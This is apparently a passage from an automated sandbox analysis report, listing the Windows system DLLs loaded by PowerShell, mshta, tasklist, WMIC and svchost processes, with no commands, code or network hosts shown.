              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: mshtml.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: powrprof.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: wkscli.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: umpdc.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: msiso.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: srpapi.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: msimtf.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: resourcepolicyclient.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: textinputframework.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: coreuicomponents.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: dataexchange.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: dcomp.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: twinapi.appcore.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: jscript9.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: version.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: textshaping.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: dxcore.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: mi.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: es.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
